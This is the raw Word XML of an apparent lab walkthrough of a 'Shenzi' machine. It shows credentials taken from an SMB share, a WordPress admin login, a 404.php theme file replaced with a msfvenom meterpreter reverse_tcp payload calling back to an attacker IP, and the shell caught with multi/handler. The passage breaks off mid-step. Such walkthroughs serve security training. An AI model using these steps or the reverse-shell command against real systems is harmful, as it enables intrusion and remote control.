                    <w:t>Shenzi</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> share has passwords.txt file, we will download it which can be used for login in </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>wordpress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> admin account.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="19EB70D5"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smb</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>: \&gt; get passwords.txt</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="78546E19"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lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="088E0B3F" wp14:editId="4C522FF3">
                        <wp:extent cx="5613400" cy="320040"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="3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5613400" cy="320040"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5A10A34D" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:keepNext/>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cat passwords.txt</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="54080740" w14:textId="60F31F45" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:noProof/>
                      <w:color w:val="111111"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="080662BC" wp14:editId="78067786">
                        <wp:extent cx="5613400" cy="4608830"/>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5613400" cy="4608830"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="111111"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">From all the password </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>admin:FeltHeadwallWight</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">357 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="111111"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">looks interesting, We couldn’t find any interesting directory with our directory busting enumeration using common wordlists, however if use our Share name it </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="111111"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>revels</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="111111"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> a </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="111111"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>wordpress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="111111"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> site.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="530B15F0"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http://192.168.232.55/shenzi/</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6B558368"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lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B24367C" wp14:editId="274AEE9E">
                        <wp:extent cx="5613400" cy="1744345"/>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5613400" cy="1744345"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">We used initially discovered credentials </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>admin:FeltHeadwallWight</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="FF0000"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">357 </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> from the SMB share to login into </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>wordpress</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4A9F2A36"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http://192.168.232.55/shenzi/wp-login.php</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="57233627"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00B0E663" wp14:editId="1D832647">
                        <wp:extent cx="5613400" cy="2366645"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="4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5613400" cy="2366645"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7CE15C84" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">After successfully logged in, we'll navigate to Appearance -&gt; Theme Editor -&gt; Theme Twenty </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Twenty</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> to determine the active website theme. If we select a .</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>php</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> page (such as 404.php) we discover that we can directly edit the page's source code.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6CA738CC"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http://192.168.232.55/shenzi/wp-admin/theme-editor.php?file=404.php&amp;theme=twentytwenty</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="663AEC42" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00CB67CB">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w14:paraId="7D868D72" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:noProof/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B60421E" wp14:editId="46D55373">
                        <wp:extent cx="5613400" cy="2257425"/>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5613400" cy="2257425"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="2DED36B7" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">We generated </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>meterpreter</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> payload with MSF and updated 404.php code with it to get a </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>RCE .</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                </w:p>
                <w:p w14:paraId="0058DE54"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msfvenom</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> -p </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>php</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>meterpreter</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>reverse_tcp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>lhost</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">=192.168.45.154 </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>lport</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve">=443 -f raw &gt; </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell.php</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                </w:p>
                <w:p w14:paraId="6C55F9CE"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00EF3D25" wp14:editId="75096A29">
                        <wp:extent cx="5613400" cy="650240"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="2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
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="650240"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="395D4401"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lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="053AB02B" wp14:editId="378517A5">
                        <wp:extent cx="5613400" cy="4796155"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="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
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="4796155"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="4A06BF71"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07E8ED5C" wp14:editId="0DE6A2CA">
                        <wp:extent cx="5613400" cy="2290445"/>
                        <wp:effectExtent l="0" t="0" r="0" b="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a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="2290445"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="7FEB2D29"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lastRenderedPageBreak/>
                    <w:drawing>
                      <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63FFD3FB" wp14:editId="687431A7">
                        <wp:extent cx="5613400" cy="2546985"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="3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0"/>
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="2546985"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6AAA5F1A" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">After updating 404.php file we will visit </w:t>
                  </w:r>
                  <w:hyperlink r:id="rId21">
                    <w:r>
                      <w:rPr>
                        <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                        <w:color w:val="C9211E"/>
                        <w:sz w:val="22"/>
                        <w:szCs w:val="22"/>
                      </w:rPr>
                      <w:t>http://192.168.232.55/shenzi/wp-content/themes/twentytwenty/404.php</w:t>
                    </w:r>
                  </w:hyperlink>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="C9211E"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">to execute the reverse shell and catch it using </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="C9211E"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>multi/handler</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>.</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="250F6A73"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4CA1BBF8" wp14:editId="73B4ECF0">
                        <wp:extent cx="5613400" cy="992505"/>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
                                <a:srcRect/>
                                <a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="992505"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="5B7376DF" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Helvetica Neue" w:eastAsia="Helvetica Neue" w:hAnsi="Helvetica Neue" w:cs="Helvetica Neue"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>Meanwhile, on our Metasploit console:</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="77A43295"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7EF296D7" wp14:editId="3B91A66C">
                        <wp:extent cx="5613400" cy="626110"/>
                        <wp:effectExtent l="0" t="0" r="0" b="0"/>
                        <wp:docPr id="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a:stretch>
                                  <a:fillRect/>
                                </a:stretch>
                              </pic:blipFill>
                              <pic:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="5613400" cy="626110"/>
                                </a:xfrm>
                                <a:prstGeom prst="rect">
                                  <a:avLst/>
                                </a:prstGeom>
                                <a:ln/>
                              </pic:spPr>
                            </pic:pic>
                          </a:graphicData>
                        </a:graphic>
                      </wp:inline>
                    </w:drawing>
                  </w:r>
                </w:p>
                <w:p w14:paraId="71357BB5" w14:textId="77777777" w:rsidR="00CB67CB" w:rsidRDefault="00000000">
                  <w:pPr>
                    <w:widowControl w:val="0"/>
                    <w:spacing w:after="200" w:line="360" w:lineRule="auto"/>
                    <w:jc w:val="both"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Since PHP reverse shells are somewhat unstable, let's upload a more stable shell, which we'll generate with </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>msfvenom</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> and uploading using </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:sz w:val="22"/>
                      <w:szCs w:val="22"/>
                    </w:rPr>
                    <w:t>meterpreter</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r>
                    <w:rPr>
